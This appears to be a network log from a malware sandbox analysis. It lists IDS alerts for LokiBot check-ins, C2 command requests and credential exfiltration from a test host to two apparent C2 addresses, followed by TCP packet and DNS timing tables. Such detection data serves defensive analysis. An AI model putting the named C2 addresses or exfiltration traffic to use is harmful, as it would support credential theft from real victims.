                                  192.168.2.3172.67.154.7249762802024318 06/23/22-17:54:52.263394TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249771802024313 06/23/22-17:55:04.009923TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349803802021641 06/23/22-17:55:20.890777TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349778802024313 06/23/22-17:55:15.087771TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249769802025381 06/23/22-17:55:00.833023TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349778802024318 06/23/22-17:55:15.087771TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249742802021641 06/23/22-17:54:35.573404TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249773802024318 06/23/22-17:55:09.049678TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349837802024318 06/23/22-17:55:42.276335TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983780192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349792802025381 06/23/22-17:55:18.935502TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349765802024318 06/23/22-17:54:54.716737TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349843802024313 06/23/22-17:55:45.763232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349872802021641 06/23/22-17:56:02.086134TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349837802024313 06/23/22-17:55:42.276335TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349881802025381 06/23/22-17:56:16.928509TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349765802024313 06/23/22-17:54:54.716737TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249743802024313 06/23/22-17:54:37.108830TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249772802021641 06/23/22-17:55:07.425069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249873802024313 06/23/22-17:56:04.198158TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249875802025381 06/23/22-17:56:08.656582TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249743802024318 06/23/22-17:54:37.108830TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349843802024318 06/23/22-17:55:45.763232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249873802024318 06/23/22-17:56:04.198158TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349837802025381 06/23/22-17:55:42.276335TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249859802024313 06/23/22-17:55:58.152468TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249743802021641 06/23/22-17:54:37.108830TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249746802024318 06/23/22-17:54:42.346945TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249844802024318 06/23/22-17:55:50.553165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249859802024318 06/23/22-17:55:58.152468TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249746802024313 06/23/22-17:54:42.346945TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349883802025381 06/23/22-17:56:20.757705TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249844802024313 06/23/22-17:55:50.553165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249749802021641 06/23/22-17:54:47.375834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349836802024318 06/23/22-17:55:40.617404TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983680192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249747802025381 06/23/22-17:54:44.305987TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249845802025381 06/23/22-17:55:53.427872TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249770802021641 06/23/22-17:55:02.423254TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349836802024313 06/23/22-17:55:40.617404TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249882802025381 06/23/22-17:56:19.809048TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249816802024313 06/23/22-17:55:26.329557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249877802024313 06/23/22-17:56:13.789082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249773802024313 06/23/22-17:55:09.049678TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349766802025381 06/23/22-17:54:56.372364TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249816802024318 06/23/22-17:55:26.329557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249767802021641 06/23/22-17:54:57.914899TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349778802021641 06/23/22-17:55:15.087771TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349876802021641 06/23/22-17:56:11.073086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349775802025381 06/23/22-17:55:12.061012TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349803802025381 06/23/22-17:55:20.890777TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249877802024318 06/23/22-17:56:13.789082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249741802025381 06/23/22-17:54:33.910153TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349835802024313 06/23/22-17:55:36.607918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249762802021641 06/23/22-17:54:52.263394TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349792802024318 06/23/22-17:55:18.935502TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349881802024318 06/23/22-17:56:16.928509TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349775802024318 06/23/22-17:55:12.061012TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349835802024318 06/23/22-17:55:36.607918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249875802021641 06/23/22-17:56:08.656582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349775802024313 06/23/22-17:55:12.061012TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349865802025381 06/23/22-17:56:00.557524TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249768802021641 06/23/22-17:54:59.413778TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249852802024318 06/23/22-17:55:55.592533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249873802025381 06/23/22-17:56:04.198158TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349745802021641 06/23/22-17:54:39.886492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349774802024313 06/23/22-17:55:10.726793TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349776802025381 06/23/22-17:55:13.438859TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349774802024318 06/23/22-17:55:10.726793TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249831802025381 06/23/22-17:55:33.546351TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349836802025381 06/23/22-17:55:40.617404TCP2025381ET TROJAN LokiBot Checkin4983680192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249742802025381 06/23/22-17:54:35.573404TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249769802024313 06/23/22-17:55:00.833023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349780802021641 06/23/22-17:55:16.534873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249852802024313 06/23/22-17:55:55.592533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349881802024313 06/23/22-17:56:16.928509TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249769802024318 06/23/22-17:55:00.833023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249757802021641 06/23/22-17:54:50.135454TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349792802024313 06/23/22-17:55:18.935502TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349765802025381 06/23/22-17:54:54.716737TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249882802024318 06/23/22-17:56:19.809048TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349813802025381 06/23/22-17:55:22.328153TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349813802021641 06/23/22-17:55:22.328153TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249772802024318 06/23/22-17:55:07.425069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349774802025381 06/23/22-17:55:10.726793TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349776802021641 06/23/22-17:55:13.438859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249873802021641 06/23/22-17:56:04.198158TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249816802025381 06/23/22-17:55:26.329557TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249882802021641 06/23/22-17:56:19.809048TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349865802021641 06/23/22-17:56:00.557524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349883802024318 06/23/22-17:56:20.757705TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349883802024313 06/23/22-17:56:20.757705TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249844802025381 06/23/22-17:55:50.553165TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249747802024313 06/23/22-17:54:44.305987TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249749802025381 06/23/22-17:54:47.375834TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249845802021641 06/23/22-17:55:53.427872TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249746802025381 06/23/22-17:54:42.346945TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249741802021641 06/23/22-17:54:33.910153TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249744802024318 06/23/22-17:54:38.472164TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249859802025381 06/23/22-17:55:58.152468TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349835802025381 06/23/22-17:55:36.607918TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249744802024313 06/23/22-17:54:38.472164TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249747802024318 06/23/22-17:54:44.305987TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349803802024313 06/23/22-17:55:20.890777TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249852802025381 06/23/22-17:55:55.592533TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349766802024318 06/23/22-17:54:56.372364TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249831802024313 06/23/22-17:55:33.546351TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249771802021641 06/23/22-17:55:04.009923TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349803802024318 06/23/22-17:55:20.890777TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249831802024318 06/23/22-17:55:33.546351TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983180192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249757802025381 06/23/22-17:54:50.135454TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249742802024317 06/23/22-17:54:35.573404TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974280192.168.2.3172.67.154.72
                                  192.168.2.3172.67.154.7249742802024312 06/23/22-17:54:35.573404TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349766802024313 06/23/22-17:54:56.372364TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249768802025381 06/23/22-17:54:59.413778TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349872802024313 06/23/22-17:56:02.086134TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349843802021641 06/23/22-17:55:45.763232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349765802021641 06/23/22-17:54:54.716737TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349837802021641 06/23/22-17:55:42.276335TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.3104.21.40.153
                                  192.168.2.3104.21.40.15349872802024318 06/23/22-17:56:02.086134TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.2.3104.21.40.153
                                  192.168.2.3172.67.154.7249772802024313 06/23/22-17:55:07.425069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.3172.67.154.72
                                  192.168.2.3104.21.40.15349780802025381 06/23/22-17:55:16.534873TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.3104.21.40.153
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jun 23, 2022 17:54:33.873667955 CEST4974180192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:33.906069040 CEST8049741172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:33.907007933 CEST4974180192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:33.910152912 CEST4974180192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:33.942464113 CEST8049741172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:33.943350077 CEST4974180192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:33.975655079 CEST8049741172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:34.295411110 CEST8049741172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:34.295753002 CEST8049741172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:34.296437025 CEST4974180192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:34.296827078 CEST4974180192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:34.329353094 CEST8049741172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:35.537940025 CEST4974280192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:35.570380926 CEST8049742172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:35.570612907 CEST4974280192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:35.573404074 CEST4974280192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:35.605788946 CEST8049742172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:35.605947018 CEST4974280192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:35.638160944 CEST8049742172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:35.979684114 CEST8049742172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:35.979902029 CEST4974280192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:36.012144089 CEST8049742172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:36.218437910 CEST8049742172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:36.218904018 CEST4974280192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:37.072376966 CEST4974380192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:37.104892015 CEST8049743172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:37.105021000 CEST4974380192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:37.108829975 CEST4974380192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:37.141222000 CEST8049743172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:37.141366959 CEST4974380192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:37.173758030 CEST8049743172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:37.484196901 CEST8049743172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:37.484416008 CEST4974380192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:37.517374039 CEST8049743172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:37.722713947 CEST8049743172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:37.723525047 CEST4974380192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:38.436321020 CEST4974480192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:38.468525887 CEST8049744172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:38.468648911 CEST4974480192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:38.472163916 CEST4974480192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:38.504229069 CEST8049744172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:38.504328012 CEST4974480192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:38.536420107 CEST8049744172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:38.845036030 CEST8049744172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:38.845256090 CEST4974480192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:38.845357895 CEST8049744172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:38.845438957 CEST4974480192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:38.877574921 CEST8049744172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:39.866887093 CEST4974580192.168.2.3104.21.40.153
                                  Jun 23, 2022 17:54:39.883833885 CEST8049745104.21.40.153192.168.2.3
                                  Jun 23, 2022 17:54:39.883953094 CEST4974580192.168.2.3104.21.40.153
                                  Jun 23, 2022 17:54:39.886492014 CEST4974580192.168.2.3104.21.40.153
                                  Jun 23, 2022 17:54:39.903594017 CEST8049745104.21.40.153192.168.2.3
                                  Jun 23, 2022 17:54:39.903673887 CEST4974580192.168.2.3104.21.40.153
                                  Jun 23, 2022 17:54:39.920392036 CEST8049745104.21.40.153192.168.2.3
                                  Jun 23, 2022 17:54:40.249713898 CEST8049745104.21.40.153192.168.2.3
                                  Jun 23, 2022 17:54:40.249761105 CEST8049745104.21.40.153192.168.2.3
                                  Jun 23, 2022 17:54:40.249830961 CEST4974580192.168.2.3104.21.40.153
                                  Jun 23, 2022 17:54:40.249897957 CEST4974580192.168.2.3104.21.40.153
                                  Jun 23, 2022 17:54:40.266798973 CEST8049745104.21.40.153192.168.2.3
                                  Jun 23, 2022 17:54:42.309146881 CEST4974680192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:42.341340065 CEST8049746172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:42.343955994 CEST4974680192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:42.346945047 CEST4974680192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:42.380894899 CEST8049746172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:42.383651018 CEST4974680192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:42.417906046 CEST8049746172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:42.724734068 CEST8049746172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:42.724874020 CEST4974680192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:42.757117033 CEST8049746172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:42.961307049 CEST8049746172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:42.961420059 CEST4974680192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:44.269737005 CEST4974780192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:44.302773952 CEST8049747172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:44.303009033 CEST4974780192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:44.305986881 CEST4974780192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:44.338363886 CEST8049747172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:44.338661909 CEST4974780192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:44.371105909 CEST8049747172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:44.695508003 CEST8049747172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:44.695698977 CEST4974780192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:44.695736885 CEST8049747172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:44.695832968 CEST4974780192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:44.728557110 CEST8049747172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:47.267076969 CEST4974980192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:47.299616098 CEST8049749172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:47.299771070 CEST4974980192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:47.375833988 CEST4974980192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:47.408014059 CEST8049749172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:47.408128023 CEST4974980192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:47.440428972 CEST8049749172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:47.760540009 CEST8049749172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:47.760590076 CEST8049749172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:47.760878086 CEST4974980192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:48.548027992 CEST4974980192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:48.580526114 CEST8049749172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:50.091150045 CEST4975780192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:50.123351097 CEST8049757172.67.154.72192.168.2.3
                                  Jun 23, 2022 17:54:50.123565912 CEST4975780192.168.2.3172.67.154.72
                                  Jun 23, 2022 17:54:50.135453939 CEST4975780192.168.2.3172.67.154.72
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jun 23, 2022 17:54:33.833693981 CEST4931653192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:33.859457970 CEST53493168.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:35.517091990 CEST5641753192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:35.536612988 CEST53564178.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:37.046273947 CEST5592353192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:37.070851088 CEST53559238.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:38.413971901 CEST5772353192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:38.431252003 CEST53577238.8.8.8192.168.2.3
                                  Jun 23, 2022 17:54:39.833098888 CEST5811653192.168.2.38.8.8.8
                                  Jun 23, 2022 17:54:39.858500004 CEST53581168.8.8.8192.168.2.3
